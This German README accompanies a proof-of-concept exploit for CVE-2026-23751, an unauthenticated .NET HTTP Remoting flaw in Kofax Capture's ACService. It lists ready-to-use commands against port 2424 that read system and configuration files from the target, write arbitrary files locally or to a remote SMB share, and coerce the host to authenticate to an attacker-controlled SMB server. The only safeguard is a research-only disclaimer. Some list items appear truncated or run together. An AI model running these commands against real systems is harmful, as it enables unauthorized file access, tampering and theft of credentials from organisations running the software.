
Gepatchter RemotingClient zur Ausnutzung von CVE-2026-23751 (Tungsten Automation – Kofax Capture Unauthenticated File Read/Write und SMB-Zwang über .NET HTTP Remoting)
Proof-of-Concept-Neuimplementierung der in Code White's NewRemotingTricks beschriebenen Technik, die auf Tungsten Automation Kofax Capture abzielt.
Titel: Tungsten Automation – Kofax Capture Unauthenticated File Read/Write und SMB-Coercion über .NET HTTP Remoting
CVE: CVE-2026-23751
CVE-2026-23751 betrifft Tungsten Automation Kofax Capture und ermöglicht einem nicht authentifizierten Remote-Angreifer, mit einem von Kofax Capture ACService bereitgestellten .NET-HTTP-Remoting-Endpunkt zu interagieren.
Die Schwachstelle kann für Folgendes ausgenutzt werden:
Der PoC implementiert die relevante .NET-Remoting-Technik aus Code Whites NewRemotingTricks-Projekt neu.
Der PoC zielt auf den Kofax-Capture--HTTP-Remoting-Endpunkt ab:
ACServicehttp://<target>:2424/ACService
Port 2424 ist der Standard-HTTP-Remoting-Port, der vom betroffenen Dienst verwendet wird.
Das folgende Beispiel liest die Windows-Hosts-Datei vom Zielsystem:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts
Eine Kofax-Capture-Konfigurationsdatei kann auf ähnliche Weise gelesen werden:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml
Eine Datei kann an einen Speicherort geschrieben werden, auf den der Kofax-Capture-Dienst zugreifen kann, indem der Zielpfad gefolgt vom Inhalt angegeben wird:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld
Dieselbe Funktionalität kann mit einem UNC-Pfad verwendet werden, um in eine entfernte SMB-Freigabe zu schreiben:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld
Die Möglichkeit, auf die entfernte Ressource zuzugreifen, hängt von den Berechtigungen und dem Sicherheitskontext des Kofax-Capture-Dienstes ab.
Eine file://-URI kann angegeben werden, um das Ziel dazu zu bringen, auf eine entfernte SMB-Ressource zuzugreifen:
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt
Dies kann dazu führen, dass sich der betroffene Host beim angreiferkontrollierten SMB-Server authentifiziert, abhängig von der Zielumgebung und ihrer Sicherheitskonfiguration.
Die Schwachstelle betrifft die Verwendung von .NET HTTP Remoting durch den ACService von Kofax Capture.
.NET Remoting unterstützt verschiedene URI-Schemata und Objektserialisierungsmechanismen. Durch eine spezifische Interaktion mit dem bereitgestellten Remoting-Endpunkt kann ein nicht authentifizierter Client den Dienst dazu veranlassen, Dateisystemoperationen mit vom Client bereitgestellten Pfaden durchzuführen.
Der PoC demonstriert, wie dieses Verhalten verwendet werden kann, um:
file://-Ressourcen auszulösenDer PoC demonstriert derzeit das Schreiben von Zeichenfolgendaten in Dateien. Andere Dateitypen und Payload-Formate können durch entsprechende Änderung des Quellcodes unterstützt werden.
Diese Implementierung basiert auf Forschung und Techniken, die in Folgendem vorgestellt werden:
Code White – NewRemotingTricks
ACService des ZielsRemotingClient_MBRO_Lazy.exeFür die Ausnutzung ist keine Authentifizierung gegenüber dem Kofax-Capture-Dienst erforderlich.
Dieses Repository wird ausschließlich für Sicherheitsforschung, Schwachstellenvalidierung und autorisierte Penetrationstests bereitgestellt.
Verwenden Sie diesen PoC nicht gegen Systeme ohne ausdrückliche Autorisierung. Der Autor ist nicht verantwortlich für Schäden, Datenverlust, unbefugten Zugriff oder andere Folgen, die aus der missbräuchlichen Verwendung dieser Software resultieren.